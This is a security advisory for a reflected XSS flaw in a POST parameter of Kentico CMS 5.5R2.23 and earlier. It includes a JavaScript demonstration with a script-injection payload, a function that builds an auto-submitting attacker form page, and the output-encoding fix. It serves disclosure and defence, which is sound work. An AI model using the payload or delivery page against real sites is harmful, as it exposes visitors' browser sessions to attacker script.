Kentico CMS 5.5R2.23 and below XSS POST Injection Vulnerability + Fix

Kentico CMS 5.5R2.23 and earlier suffers from a reflected XSS vulnerability: user input submitted in the ‘userContextMenu_parameter’ POST parameter to ‘/examples/webparts/membership/users-viewer.aspx’ is echoed back into the page without adequate output encoding. Because the parameter is read from the POST body, a crafted link alone is not enough; the attacker needs a page that submits a form to the vulnerable URL, and any user who loads that page has arbitrary HTML and script code executed in their browser session.
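The following is an added example and is not Kentico code or the vendor's hotfix; the page does not show the markup of users-viewer.aspx, so the reflection context (an attribute value and element text), the target host, and the payload are assumptions. It simulates echoing the POST parameter with and without HTML encoding, and shows why a POST-based reflected XSS is delivered through an auto-submitting form rather than a link.

```javascript
// Added example, not code from the advisory or from Kentico.
// Hypothetical target URL and constructed PoC payload (assumptions).
const TARGET = 'http://kentico.example/examples/webparts/membership/users-viewer.aspx';
const PARAM = 'userContextMenu_parameter';
const PAYLOAD = '"><script>alert(document.domain)</script>';

// Minimal HTML entity encoding for the HTML text/attribute context.
// Covers the same characters HttpUtility.HtmlEncode in ASP.NET escapes.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the POST value is concatenated straight into markup.
// The surrounding <div> is an assumed stand-in for the real webpart output.
function renderVulnerable(value) {
  return `<div id="userContextMenu" data-parameter="${value}">${value}</div>`;
}

// Hardened rendering: encode once, at output time, for the HTML context.
function renderHardened(value) {
  const enc = htmlEncode(value);
  return `<div id="userContextMenu" data-parameter="${enc}">${enc}</div>`;
}

// Counts tag starts ("<" followed by a letter or "/"). The template contributes
// exactly two (<div ...> and </div>); any more means the input broke out.
function tagCount(html) {
  return (html.match(/<[A-Za-z/]/g) || []).length;
}

// Attacker-side delivery page for a POST-only parameter: a hidden form that
// targets the vulnerable URL and submits itself on load. Note the attacker
// must HTML-encode the payload inside their own page so the browser posts
// the raw characters to the target.
function buildDeliveryPage(target, name, value) {
  return [
    '<html><body>',
    `<form method="POST" action="${htmlEncode(target)}">`,
    `<input type="hidden" name="${htmlEncode(name)}" value="${htmlEncode(value)}">`,
    '</form>',
    '<script>document.forms[0].submit()</script>',
    '</body></html>',
  ].join('\n');
}

// Stand-alone demonstration.
console.log('vulnerable tags:', tagCount(renderVulnerable(PAYLOAD))); // more than 2
console.log('hardened tags:  ', tagCount(renderHardened(PAYLOAD)));   // exactly 2
console.log(buildDeliveryPage(TARGET, PARAM, PAYLOAD));
```

Encoding at output is the fix that makes the reflection safe regardless of what was submitted; input filtering alone is not, since the same value may be reflected into several contexts.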

Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5015.php

Vendor patch: http://devnet.kentico.com/Bugtracker/Hotfixes.aspx

t00t!
